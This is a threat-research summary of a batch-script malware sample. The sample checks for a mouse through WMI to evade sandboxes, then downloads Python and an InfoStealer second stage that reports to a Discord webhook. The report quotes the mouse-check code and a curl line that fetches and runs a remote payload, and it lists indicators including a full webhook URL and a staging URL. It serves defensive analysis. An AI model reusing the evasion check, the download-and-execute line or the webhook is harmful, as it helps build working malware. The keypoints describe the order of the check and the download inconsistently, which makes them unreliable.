Threat Research

Simple Anti-Sandbox Technique: Where’s The Mouse?

Securonix

Malware samples increasingly use anti-sandbox checks to determine whether they run on a real machine, such as querying hardware with WMI for a connected mouse. If the check fails, the sample downloads a minimal Python environment and a second-stage InfoStealer that uses an obfuscated Discord webhook as its C2. #InfoStealer #Discord

Keypoints

  • Malware performs a sandbox/virtualization check by querying hardware via WMI to see if a mouse is connected.
  • The check: if no mouse is detected, the sample exits or proceeds with sandbox-evading actions.
  • Upon passing the check, the malware downloads a minimal Python environment to support subsequent stages.
  • It then downloads and executes a second stage (InfoStealer) and uses an obfuscated Discord webhook as its C2 channel.
  • The sample is identified by the SHA-256 hash 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb and has been noted in VirusTotal detections.
  • The analysis highlights how simple batch scripts and WMIC/WMI can be leveraged for anti-sandbox behavior and staged payload delivery.

MITRE Techniques

  • [T1047] Windows Management Instrumentation – The script uses the WMI (“Windows Management Instrumentation”) client to query the hardware and filter interesting devices. ‘The script uses the WMI (“Windows Management Instrumentation”) client to query the hardware and filter interesting devices.’
  • [T1497] Virtualization/Sandbox Evasion – The malware checks for a sandbox by detecting whether a mouse is present; ‘Indeed some basic sandboxes do not have a mouse connected to them.’
  • [T1059.003] Windows Command Shell – The sample is implemented as a Windows batch script performing hardware checks and control flow. ‘set “mouseConnected=false” for /f “tokens=2 delims==” %%I in (‘wmic path Win32_PointingDevice get PNPDeviceID /value ^| find “PNPDeviceID”‘) do ( set “mouseConnected=true” ) …’
  • [T1105] Ingress Tool Transfer – Downloads a minimal Python environment when no mouse is detected. ‘If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:’
  • [T1105] Ingress Tool Transfer – Downloads and executes the second stage from a remote URL and runs it with Python. ‘set “ENCODED_URL=…”; curl -o %OUTPUT_FILE% -s %ENCODED_URL% –insecure … python -m %OUTPUT_FILE% …’
  • [T1071.001] Web Protocols – Uses a Discord webhook as a C2 channel. ‘the Discord channel used as C2 is obfuscated.’
  • [T1027] Obfuscated/Compressed Files and Information – The C2 channel and payloads are obfuscated to hinder analysis. ‘…obfuscated…’

Indicators of Compromise

  • [File hash] 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb – Sample hash identified for the malware payload used in the article
  • [URL] https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe – Download URL for the minimal Python environment
  • [URL] https://discord.com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_ – Discord webhook used as a C2 channel
  • [URL] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection – VirusTotal detection page for the sample
  • [URL] https://rentry.co/zph33gvz/raw – Encoded URL used for the second stage in the pipeline
  • [File name] webpage.py – Name of the downloaded Python-based component executed in the second stage
  • [Domain] discord.com – Domain used by the C2 channel (Discord webhook)
  • [Domain] rentry.co – Domain involved in hosting the encoded URL for the second stage

Read more: https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/